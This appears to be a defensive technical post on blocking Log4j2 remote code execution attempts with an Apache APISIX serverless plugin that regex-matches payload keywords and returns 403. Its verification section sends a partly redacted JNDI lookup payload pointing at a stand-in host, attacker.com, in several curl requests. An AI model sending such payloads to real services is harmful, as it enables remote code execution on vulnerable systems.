The remote code execution vulnerability of Apache Log4j2 has been exposed on the Internet recently. The vulnerability was exposed in advance before the Apache Log4j2 development team was completely repaired, leading to exploitation in the wild. Projects using Log4j2 versions 2.x to 2.14.1 are at risk of being attacked.
Vulnerability analysis
From the process of reproducing the vulnerability, we can analyze that the key step to exploit the vulnerability is to construct a malicious payload, similar to
{xxxxx//attacker.com/a}Before the official release of the fully repaired version and the current environment upgrade to the repaired version, a temporary measure is needed to intercept requests carrying malicious payloads and protect the service from in-field attacks by this vulnerability.
Apache APISIX countermeasures
We can filter the request payload on Apache APISIX, match the keywords of the malicious payload with regularity, and block it.
Assuming that the keyword of the payload is "xxxxx", the serverless plug-in can be used to execute a custom interception script. The configuration example is as follows:
curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d '
{
"uri": "/*",
"plugins":{
"serverless-pre-function":{
"phase":"rewrite",
"functions":[
"return function(conf, ctx) local core = require(\"apisix.core\"); local payload, err = core.request.get_body(); if not payload then local uri_args, err = core.request.get_uri_args(ctx)\n if uri_args then payload = core.json.encode(uri_args, true) end; end; local m = ngx.re.match(payload, \"xxxxx\", \"jo\"); if m then ngx.exit(403) end; end"
]
}
},
"upstream": {
"type": "roundrobin",
"nodes": {
"127.0.0.1:1980": 1
}
}
}'Note: The configuration serverless-pre-function in the above configuration is a custom script part. The other configuration is the normal configuration of Apache APISIX, please adjust according to the actual situation.
The script corresponding to the above functions field mainly does the following things
- Extract the request payload (including GET request URL parameter passing method and POST/PUT request body parameter passing method)
- Regular matching malicious payload
- Intercept requests with malicious payload
This script provides an implementation idea for handling such malicious load requests, mainly to capture attack features, such as the jndi keyword. You can improve or optimize the script according to your needs.
verify
carried in the GET request parameters:
curl -I 'http://127.0.0.1:9080/hello?foo=${xxxxx//attacker.com/a}'
HTTP/1.1 403 Forbidden
……carried in the POST request body (application/json):
curl -i 'http://127.0.0.1:9080/hello' -H 'Content-Type: application/json' -X POST -d '
{
"foo": "${xxxxx//attacker.com/a}"
}'
HTTP/1.1 403 Forbidden
……in the POST request body (text/plain):
curl -i 'http://127.0.0.1:9080/hello' -H 'Content-Type: text/plain' -X POST -d '
{xxxxx//attacker.com/a}'
HTTP/1.1 403 Forbidden
……carried in the POST request body (application/x-www-form-urlencoded, without URL encoding the request body):
curl -i 'http://127.0.0.1:9080/hello' -H 'Content-Type: application/x-www-form-urlencoded' -X POST -d '
foo=${xxxxx//attacker.com/a}'
HTTP/1.1 403 Forbidden
……About Apache APISIX
Apache APISIX is a dynamic, real-time, high-performance open source API gateway that provides rich traffic management functions such as load balancing, dynamic upstream, grayscale publishing, service fuse, identity authentication, and observability. Apache APISIX can help companies quickly and securely process API and microservice traffic, including gateways, Kubernetes Ingress, and service meshes.
Apache APISIX landing users (only some)
- Apache APISIX GitHub:https://github.com/apache/apisix
- Apache APISIX official website: https://apisix.apache.org/
- Apache APISIX documentation: https://apisix.apache.org/en/docs/apisix/getting-started
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用。你还可以使用@来通知其他用户。